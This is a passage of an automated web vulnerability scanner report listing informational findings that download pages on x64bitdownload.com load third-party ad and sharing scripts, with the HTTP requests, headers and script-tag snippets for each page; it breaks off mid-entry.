21.1433. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /download/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:47 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 24883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1434. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1435. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1436. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59907


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1437. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53837


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1438. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60009


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1439. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55606


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1440. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55307


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1441. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55142


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1442. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57457


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1443. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-oovoo-download-jrletedp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1444. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:37 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73; expires=Sat, 23 Jul 2011 14:54:37 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1445. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html/x22 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57059


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1446. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1447. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-pidgin-download-kkwthbed.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
